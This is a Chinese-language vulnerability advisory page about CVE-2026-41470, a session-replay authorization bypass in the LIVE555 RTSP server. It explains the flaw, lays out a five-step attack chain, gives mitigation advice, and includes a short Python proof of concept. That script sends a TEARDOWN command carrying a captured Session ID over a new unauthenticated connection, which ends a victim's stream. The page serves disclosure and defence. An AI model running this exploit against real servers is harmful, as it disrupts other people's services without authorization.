IPBUF安全漏洞报告
English
CVE-2026-41470 CVSS 5.9 中危

CVE-2026-41470 LIVE555授权绕过漏洞

披露日期: 2026-05-19
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41470
漏洞类型
授权绕过
CVSS评分
5.9 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
LIVE555

相关标签

授权绕过LIVE555RTSPDoSSession Replay

漏洞概述

LIVE555在2026.04.22之前的版本中存在授权绕过漏洞。该漏洞源于RTSP会话命令处理逻辑的缺陷,允许攻击者从未认证的连接中重放有效的会话令牌。攻击者一旦获取到有效的Session令牌,便可以在第二个TCP连接上无需认证即可发送PLAY和TEARDOWN命令。这可能导致服务器通过虚函数调用错误崩溃,或通过终止受害者会话来破坏活跃的流媒体传输,从而严重影响服务的可用性。

技术细节

该漏洞位于LIVE555 Streaming Media的RTSP服务器实现中。LIVE555在处理RTSP会话时,允许客户端通过Session ID来标识建立的会话。然而,在受影响版本中,服务器未严格验证携带Session ID的请求来源是否为原始建立会话的连接。攻击者可以通过嗅探网络流量或其他方式获取一个合法的RTSP会话ID。随后,攻击者创建一个新的TCP连接,并在RTSP请求中(如PLAY或TEARDOWN)直接重放该Session ID。由于服务器仅检查Session ID的有效性而未验证连接上下文或重新进行认证,攻击者成功绕过了授权检查。利用TEARDOWN命令可以强制关闭受害者的流媒体会话,造成服务拒绝。更严重的是,发送特定构造的PLAY命令或操作可能导致服务器在处理虚函数调用时发生逻辑错误,进而引发崩溃(DoS)。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标LIVE555 RTSP服务器,并确认其版本小于2026.04.22。
STEP 2
2. 获取令牌
攻击者通过嗅探网络流量或建立合法连接,获取一个有效的RTSP Session ID。
STEP 3
3. 建立连接
攻击者向目标服务器发起新的TCP连接,该连接不经过身份验证。
STEP 4
4. 重放攻击
攻击者在新的连接中发送PLAY或TEARDOWN命令,并在头部填入窃取的Session ID。
STEP 5
5. 达成影响
服务器接受命令,导致流中断或服务器崩溃。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket # CVE-2026-41470 PoC: LIVE555 Authorization Bypass via Session Replay # Target: LIVE555 < 2026.04.22 # Description: Replays a valid Session token from a second connection to send commands without auth. def exploit(target_ip, target_port, session_id): # Create a new TCP connection (unauthenticated) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Construct a TEARDOWN command with the captured Session ID # This command usually requires authentication, but is accepted due to the bug payload = f"TEARDOWN rtsp://{target_ip}:{target_port}/stream RTSP/1.0\r\n" payload += f"Session: {session_id}\r\n" payload += f"CSeq: 3\r\n\r\n" print(f"[*] Sending malicious TEARDOWN with Session: {session_id}") s.send(payload.encode()) # Receive response response = s.recv(1024) print(f"[+] Response:\n{response.decode()}") s.close() if __name__ == "__main__": # Example usage # Attacker needs to sniff or guess a valid session_id first target = "192.168.1.100" port = 554 valid_session_id = "1234567890" # Replace with a valid Session ID observed in traffic exploit(target, port, valid_session_id)

影响范围

LIVE555 < 2026.04.22

防御指南

临时缓解措施
如果无法立即升级补丁,建议配置防火墙规则,仅允许可信的IP地址访问RTSP服务,或者通过VPN隧道访问流媒体服务,以减少令牌被截获的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表